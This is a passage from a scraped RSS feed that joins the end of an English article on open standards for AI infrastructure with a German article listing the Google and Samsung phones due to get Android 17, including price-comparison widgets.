<p>Parker agrees that open protocols will underlie future AI progress. “We’ll see continued development and progress on AI agents which will rely on protocols like MCP and ACP [<a href="https://www.infoworld.com/article/4007686/a-developers-guide-to-ai-protocols-mcp-a2a-and-acp.html">Agent Client Protocol</a>] to interoperate with various clients and each other,” he says. Yet a gap remains around API conventions for models. “It would be nice if we could get a commitment from model providers to use a standard here.”</p>



<p>For the AAIF’s Surtani, opening up the protocol layer is the most important aspect. “I think it’s really important for interoperability, for choice,” he says. “It means you can bring your own agent, you can bring your own framework, you can bring your own harness, and pick what model you want.”</p>



<p>Open standards may also play a significant role within <a href="https://www.infoworld.com/article/4117620/edge-ai-the-future-of-ai-inference-is-smarter-local-compute.html">inference architecture</a>. “As AI expands to the edge, developers need visibility into how models run, how memory is used, and how performance scales,” says Shaposhnik. Open systems could make it easier to optimize, debug, and adapt while helping enterprises avoid observability fragmentation.</p>



<p>Lastly, <a href="https://www.infoworld.com/article/3498485/the-future-of-kubernetes-and-cloud-infrastructure.html">cloud-native architectural standards</a> are a key ingredient for open AI infrastructure. “We’re seeing Kubernetes become the missing link for people who want the hyperscaler-style convenience without hyperscaler lock-in,” says Percona’s Farkas. For him, Kubernetes has become the de facto hybrid enterprise deployment option for data, workloads, and AI components.</p>



<h2 class="wp-block-heading">History repeats itself</h2>



<p>The <a href="https://opensource.org/blog/the-2026-state-of-open-source-report">2026 State of Open Source Report</a> found avoiding vendor lock-in to be the primary driver of open source adoption. But beyond being a strategic decision for a single company, open infrastructure provides a layer for entire industries to be built upon.</p>



<p>Arguably, the internet itself is evidence of this, where groups like the <a href="https://www.ietf.org/">IETF</a> and the <a href="https://www.ieee.org/">IEEE</a> were instrumental in defining the fundamental protocols. “Without open protocols we would’ve been in telco hell and without phenomenons like Google or Facebook,” says Shaposhnik.</p>



<p>Or, take the <a href="https://www.infoworld.com/article/2335646/thirty-two-years-of-linux-and-its-community.html">history of Linux</a> as a parallel. “Linux became the default operating system because it offered a common, vendor-neutral foundation that everyone could build on,” says Collier. “In the AI era, open infrastructure will define the layers that organizations rely on for long-term continuity.”</p>



<p>At the infrastructure level, open standards have repeatedly underpinned major platform shifts, from <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> to <a href="https://www.infoworld.com/article/3812622/will-kubernetes-ever-get-easier.html">Kubernetes</a>. The question now is whether AI will develop a similarly durable standards layer.</p>



<p>For Parker, it’s too early to say, but the current growth of AI mirrors the early cloud. “Remember that it took many years before we saw the development and popularization of the open source cloud-native ecosystem,” he says. “I think it would be a mistake to extrapolate from the current trajectory towards a closed, proprietary future.”</p>



<p>Others agree the future must be rooted in openness. “I see open infrastructure becoming the foundation of enterprise AI,” says R Systems’s Abhyankar. “As systems become more distributed and agent‑driven, closed ecosystems simply won’t scale.”</p>



<p>The groundwork is being laid through open agentic protocols, open frameworks, and industry support intended to reduce fragmentation around proprietary standards.</p>



<p>“Ironically, the AI movement has mostly seemed to learn from the mistakes of the past and is starting off on a more open foot,” says Parker. “Over time, I believe we’ll see innovation and openness thrive.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17: Diese Smartphones bekommen das Update]]></title>
<description><![CDATA[Android 17, das neueste Update von Googles Betriebssystem, ist endlich erschienen und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.



Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überh...]]></description>
<link>https://tsecurity.de/de/3614622/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614622/it-nachrichten/android-17-diese-smartphones-bekommen-das-update/</guid>
<pubDate>Mon, 22 Jun 2026 08:17:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a>, das neueste Update von Googles Betriebssystem, <a href="https://www.pcwelt.de/article/3167761/android-17-ist-endlich-da-so-bekommen-sie-das-update.html" target="_blank" rel="noreferrer noopener">ist endlich erschienen</a> und bringt einige spannende Neuerungen für Android-Nutzer. Darunter neue Funktionen, verbesserte Sicherheit und vieles mehr.</p>



<p>Höchste Zeit also, zu prüfen, welche Smartphones das Upgrade auf die neue Version überhaupt erhalten! Welche Smartphones immer noch aktualisiert und auch mit <strong>Android 17 </strong>versorgt werden, verrät unsere Übersicht. Diese ist nach Marken sortiert und enthält auch Links zu unseren Testberichten der jeweiligen Modelle.</p>



<p>Da die Hersteller aktueller Smartphones <a href="https://www.pcwelt.de/article/2808830/ab-20-juni-2025-laengerer-support-fuer-smartphones.html" target="_blank" rel="noreferrer noopener">seit 2025</a> dazu verpflichtet sind, mindestens <strong>fünf Jahre </strong>lang Updates für ihre Geräte zu liefern, fällt die Liste recht ähnlich zu der von <a href="https://www.pcwelt.de/article/2814156/android-16-diese-smartphones-bekommen-das-update.html" target="_blank" rel="noreferrer noopener">Android 16</a> aus. Einige Geräte fliegen in diesem Jahr aber dennoch aus dem Update-Zyklus heraus (siehe <a href="https://www.pcwelt.de/article/3129020/android-17-diese-smartphones-bekommen-das-update-nicht-mehr.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update nicht mehr</a>).</p>



<p><em><strong>Hinweis:</strong> Einige Hersteller treffen klare Aussagen bezüglich der geplanten Update-Zeiträume ihrer Geräte. Andere halten sich nur grob an die EU-Richtlinie. Genießen Sie die Angaben also mit Vorsicht, denn spontan kann sich immer etwas ändern.</em></p>



<h2 class="wp-block-heading">Google</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2efe1d70"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Google-Pixel-10a-review-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10a review 3" class="wp-image-3078312" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundy</p></div>



<p>Google liefert bekanntlich als erstes Update auf Android 17, da es keine weiteren Anpassungen für die hauseigenen Pixel-Smartphones vornehmen muss. Der Rollout ist hier bereits gestartet. Durch die erweiterte Update-Garantie von Google fallen im Vergleich zu Android 16 auch keine Geräte raus.</p>



<p>Diese Google-Smartphones werden das Update auf Android 17 bekommen:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3065303/google-pixel-10a-vorgestellt-preis-erscheinungsdatum-farben-specs.html" target="_blank" rel="noreferrer noopener">Pixel 10a</a></li>



<li><a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel 10</a></li>



<li><a href="https://www.pcwelt.de/article/2894857/google-pixel-10-pro-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro</a></li>



<li>Pixel 10 Pro XL</li>



<li><a href="https://www.pcwelt.de/article/2945312/google-pixel-10-pro-test-3.html" target="_blank" rel="noreferrer noopener">Pixel 10 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2687125/google-pixel-9a-test-2.html" target="_blank" rel="noreferrer noopener">Pixel 9a</a></li>



<li><a href="https://www.pcwelt.de/article/2434705/google-pixel-9-test.html" target="_blank" rel="noreferrer noopener">Pixel 9</a></li>



<li>Pixel 9 Pro</li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro XL</a></li>



<li><a href="https://www.pcwelt.de/article/2434665/google-pixel-9-pro-xl-testbericht.html" target="_blank" rel="noreferrer noopener">Pixel 9 Pro Fold</a></li>



<li><a href="https://www.pcwelt.de/article/2111264/google-pixel-8-test.html" target="_blank" rel="noreferrer noopener">Pixel 8</a></li>



<li><a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/2779688/google-pixel-8a-test.html" target="_blank" rel="noreferrer noopener">Pixel 8a</a></li>



<li><a href="https://www.pcwelt.de/article/1812910/google-pixel-7-test-smartphone.html" target="_blank" rel="noreferrer noopener">Pixel 7</a></li>



<li><a href="https://www.pcwelt.de/article/1352376/google-pixel-7-pro-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 7 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1815523/google-pixel-7a-test.html" target="_blank" rel="noreferrer noopener">Pixel 7a</a></li>



<li><a href="https://www.pcwelt.de/article/1200502/google-pixel-6-im-test.html" target="_blank" rel="noreferrer noopener">Pixel 6</a></li>



<li><a href="https://www.pcwelt.de/article/1200514/google-pixel-6-pro-im-test-vertrautes-android-erlebnis-in-neuem-gewand.html" target="_blank" rel="noreferrer noopener">Pixel 6 Pro</a></li>



<li><a href="https://www.pcwelt.de/article/1206583/test-google-pixel-6a.html" target="_blank" rel="noreferrer noopener">Pixel 6a</a></li>
</ul>



<p><strong>Google Pixel 10 Pro XL im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>939,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260622&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="939,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 939,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.076,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_T23bFBYxEuRDMrEUYsO-lVt6WZAp33cQaVONtFskVz1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260622&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_T23bFBYxEuRDMrEUYsO-lVt6WZAp33cQaVONtFskVz1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.076,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.076,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Samsung</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a38d2eff02c0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Samsung-Galaxy-S26-Ultra-review-7.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy S26 Ultra review 7" class="wp-image-3082181" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Samsung versorgt seine aktuellen Smartphones länger mit Updates als eigentlich vorgeschrieben. Die Top-Modelle bekommen heute bis zu sieben Generationen an Android-Upgrades, einige A-Modelle zumindest für sechs Generationen.</p>



<p>Für einige Budget-Modelle fehlen genaue Angaben. Nach unserem Stand müssten diese Samsung-Smartphones aber Android 17 erhalten:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy S26</a> / <a href="https://www.pcwelt.de/article/3084364/samsung-galaxy-s26-plus-test.html" target="_blank" rel="noreferrer noopener">S26+</a> / <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S26 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2898610/galaxy-s25-fe-hands-on.html" target="_blank" rel="noreferrer noopener">Galaxy S25 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2800144/samsung-galaxy-s25-edge-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25 Edge</a></li>



<li><a href="https://www.pcwelt.de/article/2604993/samsung-galaxy-s25-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25</a> / <a href="https://www.pcwelt.de/article/2625286/samsung-galaxy-s25-plus-test.html" target="_blank" rel="noreferrer noopener">S25+</a> / <a href="https://www.pcwelt.de/article/2605138/samsung-galaxy-s25-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S25 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2471013/samsung-galaxy-s24-fe-vorgestellt-3-wichtige-upgrades-fuer-das-guenstigere-modell.html" target="_blank" rel="noreferrer noopener">Galaxy S24 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2287812/samsung-galaxy-s24-test.html" target="_blank" rel="noreferrer noopener">Galaxy S24 </a>/ <a href="https://www.pcwelt.de/article/2285159/samsung-galaxy-s24-plus-test.html" target="_blank" rel="noreferrer noopener">S24+</a> / <a href="https://www.pcwelt.de/article/2220194/samsung-galaxy-s24-ultra-test.html" target="_blank" rel="noreferrer noopener">S24 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/1486833/samsung-galaxy-s23-ultra-test.html" target="_blank" rel="noreferrer noopener">Galaxy S23 / S23+</a> / <a href="https://www.pcwelt.de/article/1506767/samsung-galaxy-s23-ultra-im-test.html" target="_blank" rel="noreferrer noopener">S23 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/3119761/samsung-galaxy-a57-test.html" target="_blank" rel="noreferrer noopener">Galaxy A57</a></li>



<li><a href="https://www.pcwelt.de/article/3140779/samsung-galaxy-a37-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A37</a></li>



<li><a href="https://www.pcwelt.de/article/2969981/samsung-galaxy-a17-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A17 5G</a></li>



<li><a href="https://www.pcwelt.de/article/2653268/samsung-galaxy-a16-test.html" target="_blank" rel="noreferrer noopener">Galaxy A16</a></li>



<li><a href="https://www.pcwelt.de/article/2262254/samsung-galaxy-a25-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A25</a></li>



<li>Galaxy A26</li>



<li><a href="https://www.pcwelt.de/article/2654481/samsung-galaxy-a36-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A36</a></li>



<li><a href="https://www.pcwelt.de/article/2771730/samsung-galaxy-a56-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A56</a></li>



<li>Galaxy A35</li>



<li>Galaxy A55</li>



<li><a href="https://www.pcwelt.de/article/1782064/samsung-galaxy-a54-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A54</a></li>



<li><a href="https://www.pcwelt.de/article/1813124/samsung-galaxy-a34-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A34</a></li>



<li>Galaxy M54</li>



<li>Galaxy M35</li>



<li><a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a></li>



<li><a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 7</a></li>



<li><a href="https://www.pcwelt.de/article/2420827/samsung-galaxy-z-fold-6-test-nicht-neu-aber-definitiv-verbessert.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 6</a></li>



<li><a href="https://www.pcwelt.de/article/2408951/test-samsung-galaxy-z-flip-6-es-dreht-sich-alles-um-ki.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 6</a></li>



<li><a href="https://www.pcwelt.de/article/2033820/samsung-galaxy-z-fold-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 5</a></li>



<li><a href="https://www.pcwelt.de/article/2024386/samsung-galaxy-z-flip-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 5</a></li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr: </strong>Galaxy S22 / S22+ / S22 Ultra, S21 FE, A53, A73, XCover 6 Pro, Z Fold4, Z Flip4.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Die besten Samsung Galaxy Smartphones aller Preisklassen im Test</a></p>



<p><strong>Samsung Galaxy S26 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=B0A4_H_kyougFdiMIpCMzMeIgpOoWTPmb7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=B0A4_H_kyougFdiMIpCMzMeIgpOoWTPmb7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="949,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.018,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8m9HflUHosRgvrhhe5GGHf7XY1VZtNU7apAHkXWzHeXD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8m9HflUHosRgvrhhe5GGHf7XY1VZtNU7apAHkXWzHeXD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.018,90 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.018,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.151,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260622&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.151,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 1.151,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record amazon_forth_place ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.159,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=4l-tfKOmtMCXVSmyu4TSBPEx-hPUMUXSEdvBN14MfQK5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260622&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" 